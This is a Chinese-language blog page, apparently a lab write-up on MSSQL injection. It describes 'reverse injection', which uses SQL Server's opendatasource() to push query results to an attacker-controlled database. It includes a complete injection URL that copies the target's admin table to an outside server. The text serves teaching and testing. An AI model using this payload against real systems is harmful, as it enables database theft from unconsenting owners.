<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><link rel="stylesheet" type="text/css" href="//fonts.loli.net/css?family=Source+Code+Pro"><link rel="stylesheet" type="text/css" href="/css/style.css?v=2.0.4"><link rel="stylesheet" type="text/css" href="/css/highlight.css?v=2.0.4"><link rel="Shortcut Icon" href="/favicon.ico"><link rel="bookmark" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><title> | Hexo</title></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Hexo</h1><a id="logo" href="/.">Hexo</a><p class="description"></p></div><div id="nav-menu"><a href="/." class="current"><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div><div id="search-form"><div id="result-mask" class="hide"></div><label><input id="search-key" type="text" autocomplete="off" placeholder="search"></label><div id="result-wrap" class="hide"><div id="search-result"></div></div><div class="hide"><template id="search-tpl"><div class="item"><a href="/{path}" title="{title}"><div class="title">{title}</div><div class="time">{date}</div><div class="tags">{tags}</div></a></div></template></div></div></div><div id="layout" class="layout-g"><div class="layout-l"><div class="content_container"><div class="post"><h1 class="post-title"></h1><div class="post-meta"><a href="/2019/10/08/MSSQL/#comments" class="comment-count"></a><p><span class="date">Oct 08, 2019</span><span><i id="busuanzi_container_page_pv"><i id="busuanzi_value_page_pv"></i><i>Hits</i></i></span></p></div><div class="post-content"><!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">

  <title>MSSQL注入 | KING</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<pre><code>&lt;meta name=&quot;keywords&quot; content=&quot;king,&quot;&gt;</code></pre>  <meta name="description" content="用 id=2’ 进行测试，发现报错，显示 odbc_exec() :xxxx 的错误,说明用的是MSSQL数据库： 这里确实是存在注入点的，但用了几个测试语句都无法注入，也没有什么有价值的回显。所以这里就用上了反弹注入。 反弹注入就是利用SQL SERVER的opendatasource() 函数，来将查询结果发送到另一个外网服务器的SQL SERVER数据库中。  首先在自己用来接收查询结果的外">
<meta property="og:type" content="article">
<meta property="og:title" content="MSSQL注入">
<meta property="og:url" content="http://zzz1233.xyz/2019/03/26/MSSQL注入/index.html">
<meta property="og:site_name" content="KING">
<meta property="og:description" content="用 id=2’ 进行测试，发现报错，显示 odbc_exec() :xxxx 的错误,说明用的是MSSQL数据库： 这里确实是存在注入点的，但用了几个测试语句都无法注入，也没有什么有价值的回显。所以这里就用上了反弹注入。 反弹注入就是利用SQL SERVER的opendatasource() 函数，来将查询结果发送到另一个外网服务器的SQL SERVER数据库中。  首先在自己用来接收查询结果的外">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-05-14T11:56:35.990Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MSSQL注入">
<meta name="twitter:description" content="用 id=2’ 进行测试，发现报错，显示 odbc_exec() :xxxx 的错误,说明用的是MSSQL数据库： 这里确实是存在注入点的，但用了几个测试语句都无法注入，也没有什么有价值的回显。所以这里就用上了反弹注入。 反弹注入就是利用SQL SERVER的opendatasource() 函数，来将查询结果发送到另一个外网服务器的SQL SERVER数据库中。  首先在自己用来接收查询结果的外">


<pre><code>&lt;link rel=&quot;icon&quot; href=&quot;/favicon.ico&quot;&gt;</code></pre>  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
  <link rel="stylesheet" href="/css/style.css">
  <script src="/js/pace.min.js"></script>





</head>
</html>
<body>
  <div id="container">
      <header id="header">
    <div id="banner"></div>
    <div id="header-outer">
        <div id="header-menu" class="header-menu-pos animated">
            <div class="header-menu-container">
                <a href="/" class="left">
                    <span class="site-title">KING</span>
                </a>
                <nav id="header-menu-nav" class="right">

<pre><code>                &lt;a href=&quot;/&quot;&gt;
                    &lt;i class=&quot;fa fa-home&quot;&gt;&lt;/i&gt;
                    &lt;span&gt;Home&lt;/span&gt;
                &lt;/a&gt;

                &lt;a href=&quot;/archives&quot;&gt;
                    &lt;i class=&quot;fa fa-archive&quot;&gt;&lt;/i&gt;
                    &lt;span&gt;Archives&lt;/span&gt;
                &lt;/a&gt;

                &lt;a href=&quot;/about&quot;&gt;
                    &lt;i class=&quot;fa fa-user&quot;&gt;&lt;/i&gt;
                    &lt;span&gt;About&lt;/span&gt;
                &lt;/a&gt;

            &lt;/nav&gt;
            &lt;a class=&quot;mobile-header-menu-button&quot;&gt;
                &lt;i class=&quot;fa fa-bars&quot;&gt;&lt;/i&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div id=&quot;header-row&quot;&gt;
        &lt;div id=&quot;logo&quot;&gt;
            &lt;a href=&quot;/&quot;&gt;
                &lt;img src=&quot;/images/logo.png&quot; alt=&quot;logo&quot;&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div class=&quot;header-info&quot;&gt;
            &lt;div id=&quot;header-title&quot;&gt;

                &lt;h2&gt;
                    KING
                &lt;/h2&gt;

            &lt;/div&gt;
            &lt;div id=&quot;header-description&quot;&gt;

                &lt;h3&gt;
                    WELCOME HERE
                &lt;/h3&gt;

            &lt;/div&gt;
        &lt;/div&gt;
        &lt;nav class=&quot;header-nav&quot;&gt;
            &lt;div class=&quot;social&quot;&gt;

                    &lt;a title=&quot;MinHow&quot; target=&quot;_blank&quot; href=&quot;//minhow.com&quot;&gt;
                        &lt;i class=&quot;fa fa-home fa-2x&quot;&gt;&lt;/i&gt;&lt;/a&gt;

                    &lt;a title=&quot;Github&quot; target=&quot;_blank&quot; href=&quot;//github.com/wongminho&quot;&gt;
                        &lt;i class=&quot;fa fa-github fa-2x&quot;&gt;&lt;/i&gt;&lt;/a&gt;

                    &lt;a title=&quot;Weibo&quot; target=&quot;_blank&quot; href=&quot;//weibo.com/WongMinHo&quot;&gt;
                        &lt;i class=&quot;fa fa-weibo fa-2x&quot;&gt;&lt;/i&gt;&lt;/a&gt;

                    &lt;a title=&quot;Twitter&quot; target=&quot;_blank&quot; href=&quot;//twitter.com/huangminhow&quot;&gt;
                        &lt;i class=&quot;fa fa-twitter fa-2x&quot;&gt;&lt;/i&gt;&lt;/a&gt;

            &lt;/div&gt;
        &lt;/nav&gt;
    &lt;/div&gt;
&lt;/div&gt;</code></pre></nav></div></div></div></header>
      <div class="outer">
        <section id="main" class="body-wrap"><article id="post-MSSQL注入" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-inner">

<pre><code>  &lt;header class=&quot;article-header&quot;&gt;


&lt;h1 class=&quot;post-title&quot; itemprop=&quot;name&quot;&gt;
  MSSQL注入
&lt;/h1&gt;
&lt;div class=&quot;post-title-bar&quot;&gt;
  &lt;ul&gt;

    &lt;li&gt;
      &lt;i class=&quot;fa fa-calendar&quot;&gt;&lt;/i&gt;  2019-03-26
    &lt;/li&gt;
    &lt;li&gt;
      &lt;i class=&quot;fa fa-eye&quot;&gt;&lt;/i&gt;
      &lt;span id=&quot;busuanzi_value_page_pv&quot;&gt;&lt;/span&gt;
    &lt;/li&gt;
  &lt;/ul&gt;
&lt;/div&gt;



  &lt;/header&gt;

&lt;div class=&quot;article-entry post-content&quot; itemprop=&quot;articleBody&quot;&gt;


        &lt;p&gt;用 id=2’ 进行测试，发现报错，显示 odbc_exec() :xxxx 的错误,说明用的是MSSQL数据库：&lt;/p&gt;</code></pre><p>这里确实是存在注入点的，但用了几个测试语句都无法注入，也没有什么有价值的回显。所以这里就用上了反弹注入。</p>
<p><strong><strong>反弹注入就是利用SQL SERVER的opendatasource() 函数，来将查询结果发送到另一个外网服务器的SQL SERVER数据库中。</strong></strong></p>
<hr>
<p>首先在自己用来接收查询结果的外网服务器中，搭建好SQL SERVER数据库的环境，然后建立一个具有管理权限的数据库账户：<br><a href="http://www.webweb.com" target="_blank" rel="noopener">建库</a> <a href="https://10minutemail.net" target="_blank" rel="noopener">十分钟邮箱</a></p>
<p>建好后，访问链接：</p>
<pre><code>http://120.203.13.75:8150/MSSQL/?id=2&apos;; insert into opendatasource(&apos;sqloledb&apos;,&apos;server=SQL5006.webweb.com,1433;uid=DB_14A8E46_qwer_admin;pwd=qwer1234;database=DB_14A8E46_qwer&apos;).DB_14A8E46_qwer.dbo.test select * from admin --+
</code></pre><p>查看自己的数据库DB_14A8E46_qwer中的testp表，获取到我们想要查询的数据。</p>

<pre><code>        &lt;div class=&quot;post-copyright&quot;&gt;
&lt;div class=&quot;content&quot;&gt;
    &lt;p&gt;最后更新： 2019年05月14日 19:56&lt;/p&gt;
    &lt;p&gt;原始链接： &lt;a class=&quot;post-url&quot; href=&quot;/2019/03/26/MSSQL注入/&quot; title=&quot;MSSQL注入&quot;&gt;http://zzz1233.xyz/2019/03/26/MSSQL注入/&lt;/a&gt;&lt;/p&gt;
    &lt;footer&gt;
        &lt;a href=&quot;http://zzz1233.xyz&quot;&gt;
            &lt;img src=&quot;/images/logo.png&quot; alt=&quot;king&quot;&gt;
            king
        &lt;/a&gt;
    &lt;/footer&gt;
&lt;/div&gt;</code></pre></div>




<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" target="_blank" rel="noopener">赏</a>
</div>

<div id="reward" class="post-modal reward-lay">
    <a class="close" href="javascript:;" id="reward-close" target="_blank" rel="noopener">×</a>
    <span class="reward-title">
        <i class="icon icon-quote-left"></i>
        请我吃糖~
        <i class="icon icon-quote-right"></i>
    </span>
    <div class="reward-content">

<pre><code>    &lt;div class=&quot;reward-code&quot;&gt;
        &lt;img id=&quot;rewardCode&quot; src=&quot;/images/wechat_code.jpg&quot; alt=&quot;打赏二维码&quot;&gt;
    &lt;/div&gt;
    &lt;div class=&quot;reward-select&quot;&gt;

        &lt;label class=&quot;reward-select-item checked&quot; data-id=&quot;wechat&quot; data-wechat=&quot;/images/wechat_code.jpg&quot;&gt;
            &lt;img class=&quot;reward-select-item-wechat&quot; src=&quot;/images/wechat.png&quot; alt=&quot;微信&quot;&gt;
        &lt;/label&gt;


        &lt;label class=&quot;reward-select-item&quot; data-id=&quot;alipay&quot; data-alipay=&quot;/images/alipay_code.jpg&quot;&gt;
            &lt;img class=&quot;reward-select-item-alipay&quot; src=&quot;/images/alipay.png&quot; alt=&quot;支付宝&quot;&gt;
        &lt;/label&gt;

    &lt;/div&gt;
&lt;/div&gt;</code></pre></div>



<pre><code>&lt;/div&gt;
&lt;footer class=&quot;article-footer&quot;&gt;</code></pre><div class="post-share">
    <a href="javascript:;" id="share-sub" class="post-share-fab" target="_blank" rel="noopener">
        <i class="fa fa-share-alt"></i>
    </a>
    <div class="post-share-list" id="share-list">
        <ul class="share-icons">
          <li>
            <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://zzz1233.xyz/2019/03/26/MSSQL注入/&title=《MSSQL注入》 — KING&pic=http://zzz1233.xyzimages/logo.png" data-title="微博">
              <i class="fa fa-weibo"></i>
            </a>
          </li>
          <li>
            <a class="weixin share-sns" id="wxFab" href="javascript:;" data-title="微信" target="_blank" rel="noopener">
              <i class="fa fa-weixin"></i>
            </a>
          </li>
          <li>
            <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://zzz1233.xyz/2019/03/26/MSSQL注入/&title=《MSSQL注入》 — KING&source=" data-title="QQ">
              <i class="fa fa-qq"></i>
            </a>
          </li>
          <li>
            <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://zzz1233.xyz/2019/03/26/MSSQL注入/" data-title="Facebook">
              <i class="fa fa-facebook"></i>
            </a>
          </li>
          <li>
            <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《MSSQL注入》 — KING&url=http://zzz1233.xyz/2019/03/26/MSSQL注入/&via=http://zzz1233.xyz" data-title="Twitter">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
          <li>
            <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://zzz1233.xyz/2019/03/26/MSSQL注入/" data-title="Google+">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        </ul>
     </div>
</div>
<div class="post-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;" id="wxShare-close" target="_blank" rel="noopener">×</a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://zzz1233.xyz/2019/03/26/MSSQL注入/" alt="微信分享二维码">
</div>

<div class="mask"></div>


<pre><code>    &lt;ul class=&quot;article-footer-menu&quot;&gt;


    &lt;/ul&gt;

&lt;/footer&gt;</code></pre>  </div>
</article>



<nav id="article-nav">

<pre><code>&lt;a href=&quot;/2019/03/27/oracle/&quot; id=&quot;article-nav-newer&quot; class=&quot;article-nav-link-wrap&quot;&gt;

  &lt;span class=&quot;article-nav-title&quot;&gt;
    &lt;i class=&quot;fa fa-hand-o-left&quot; aria-hidden=&quot;true&quot;&gt;&lt;/i&gt;

      oracle 报错注入

  &lt;/span&gt;
&lt;/a&gt;


&lt;a href=&quot;/2019/03/26/正则/&quot; id=&quot;article-nav-older&quot; class=&quot;article-nav-link-wrap&quot;&gt;
  &lt;span class=&quot;article-nav-title&quot;&gt;正则&lt;/span&gt;
  &lt;i class=&quot;fa fa-hand-o-right&quot; aria-hidden=&quot;true&quot;&gt;&lt;/i&gt;
&lt;/a&gt;</code></pre></nav>




</section>

<pre><code>&lt;/div&gt;
&lt;footer id=&quot;footer&quot;&gt;</code></pre>  <div class="outer">
    <div id="footer-info" class="inner">

<p>
    <span id="busuanzi_container_site_uv" style="display:none">
        总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style="display:none">
        总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


<pre><code>  &lt;p&gt;
    Powered by  &lt;a href=&quot;http://hexo.io/&quot; target=&quot;_blank&quot;&gt;Hexo&lt;/a&gt;
    Theme &lt;a href=&quot;//github.com/wongminho/hexo-theme-miho&quot; target=&quot;_blank&quot;&gt;MiHo&lt;/a&gt;
  &amp;copy; 2019 king&lt;br&gt;
  &lt;/p&gt;
&lt;/div&gt;</code></pre>  </div>

    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script>
  var mihoConfig = {
      root: "http://zzz1233.xyz",
      animate: true,
      isHome: false,
      share: true,
      reward: 1
  }
</script>
<div class="sidebar">
    <div id="sidebar-search" title="Search">
        <i class="fa fa-search"></i>
    </div>
    <div id="sidebar-category" title="Categories">
        <i class="fa fa-book"></i>
    </div>
    <div id="sidebar-tag" title="Tags">
        <i class="fa fa-tags"></i>
    </div>
    <div id="sidebar-top">
        <span class="sidebar-top-icon"><i class="fa fa-angle-up"></i></span>
    </div>
</div>
<div class="sidebar-menu-box" id="sidebar-menu-box">
    <div class="sidebar-menu-box-container">
        <div id="sidebar-menu-box-categories">

<pre><code>    &lt;/div&gt;
    &lt;div id=&quot;sidebar-menu-box-tags&quot;&gt;

    &lt;/div&gt;
&lt;/div&gt;
&lt;a href=&quot;javascript:;&quot; class=&quot;sidebar-menu-box-close&quot;&gt;&amp;times;&lt;/a&gt;</code></pre></div>
<div class="mobile-header-menu-nav" id="mobile-header-menu-nav">
    <div class="mobile-header-menu-container">
        <span class="title">Menus</span>
        <ul class="mobile-header-menu-navbar">

<pre><code>        &lt;li&gt;
            &lt;a href=&quot;/&quot;&gt;
                &lt;i class=&quot;fa fa-home&quot;&gt;&lt;/i&gt;&lt;span&gt;Home&lt;/span&gt;
            &lt;/a&gt;
        &lt;/li&gt;

        &lt;li&gt;
            &lt;a href=&quot;/archives&quot;&gt;
                &lt;i class=&quot;fa fa-archive&quot;&gt;&lt;/i&gt;&lt;span&gt;Archives&lt;/span&gt;
            &lt;/a&gt;
        &lt;/li&gt;

        &lt;li&gt;
            &lt;a href=&quot;/about&quot;&gt;
                &lt;i class=&quot;fa fa-user&quot;&gt;&lt;/i&gt;&lt;span&gt;About&lt;/span&gt;
            &lt;/a&gt;
        &lt;/li&gt;

    &lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;mobile-header-tag-container&quot;&gt;
    &lt;span class=&quot;title&quot;&gt;Tags&lt;/span&gt;
    &lt;div id=&quot;mobile-header-container-tags&quot;&gt;

    &lt;/div&gt;
&lt;/div&gt;</code></pre></ul></div>
<div class="search-wrap">
    <span class="search-close">&times;</span>
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back" target="_blank" rel="noopener">
            <i class="icon icon-lg icon-chevron-left"></i>
        </a>
        <input class="search-field" placeholder="Search..." id="keywords">
        <a id="search-submit" href="javascript:;" target="_blank" rel="noopener">
            <i class="fa fa-search"></i>
        </a>
    <div class="search-container" id="search-container">
        <ul class="search-result" id="search-result">
        </ul>
    </div>
</div>

<div id="search-tpl">
    <li class="search-result-item">
        <a href="{url}" class="search-item-li">
            <span class="search-item-li-title" title="{title}">{title}</span>
        </a>
    </li>
</div>
<script src="/js/search.js"></script>
<script src="/js/main.js"></script>


  <script src="//cdn.bootcss.com/particles.js/2.0.0/particles.min.js"></script>
  <div id="particles"></div>
  <script src="/js/particles.js"></script>







  <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  <script src="//cdn.bootcss.com/scrollReveal.js/3.0.5/scrollreveal.js"></script>
  <script src="/js/animate.js"></script>


  <script src="/js/pop-img.js"></script>
  <script>
     $(".article-entry p img").popImg();
  </script>

  </div>
</div></div></div></div></div></body>
</div><div class="post-copyright"><blockquote><p>Original author: John Doe</p><p>Original link: <a href="http://yoursite.com/2019/10/08/MSSQL/">http://yoursite.com/2019/10/08/MSSQL/</a></p><p>Copyright Notice: Please indicate the source of the reprint (must retain the author's signature and link)</p></blockquote></div><div class="tags"></div><div class="post-share"><div class="social-share"><span>Share:</span></div></div><div class="post-nav"><a href="/2019/10/08/正则/" class="pre"></a><a href="/2019/09/25/hello-world/" class="next">Hello World</a></div><div id="comments"></div></div></div></div><div class="layout-r"><div id="sidebar"><div class="search-pla"></div><div id="toc" class="widget"><div class="widget-title"><i class="fa fa-fei">Contents</i></div></div><div class="widget"><div class="widget-title"><i class="fa fa-xie"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/10/08/正则/">正则</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/08/MSSQL/">MSSQL</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/25/hello-world/">Hello World</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-biao"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-archive"> Archive</i></div><ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-you"> Blogroll</i></div><ul></ul><a href="http://www.example1.com/" title="site-name1" target="_blank">site-name1</a><ul></ul><a href="http://www.example2.com/" title="site-name2" target="_blank">site-name2</a><ul></ul><a href="http://www.example3.com/" title="site-name3" target="_blank">site-name3</a></div></div></div></div><a id="totop" href="#top"></a><div id="footer"><div class="footer-info"><p><a href="/baidusitemap.xml">Site Map</a> |  <a href="/atom.xml">Subscribe to this site</a> |  <a href="/about/">Contact the blogger</a></p><p>本站总访问量：<i id="busuanzi_container_site_pv"><i id="busuanzi_value_site_pv"></i></i>次，本站总访客数:<i id="busuanzi_container_site_uv"><i id="busuanzi_value_site_uv"></i></i>人</p><p><span> Copyright &copy;<a href="/." rel="nofollow">John Doe.</a></span><span> Theme by<a rel="nofollow" target="_blank" href="https://github.com/chaooo/hexo-theme-BlueLake"> BlueLake.</a></span><span> Count by<a href="http://busuanzi.ibruce.info/"> busuanzi.</a></span><span> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a></span></p></div></div></div><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script type="text/javascript" src="/js/search.json.js?v=2.0.4"></script><script type="text/javascript" src="/js/toctotop.js?v=2.0.4" async></script><link rel="stylesheet" type="text/css" href="/share/css/share.css"><script type="text/javascript" src="/share/js/social-share.js" charset="utf-8"></script><script type="text/javascript" src="/share/js/qrcode.js" charset="utf-8"></script></body></html>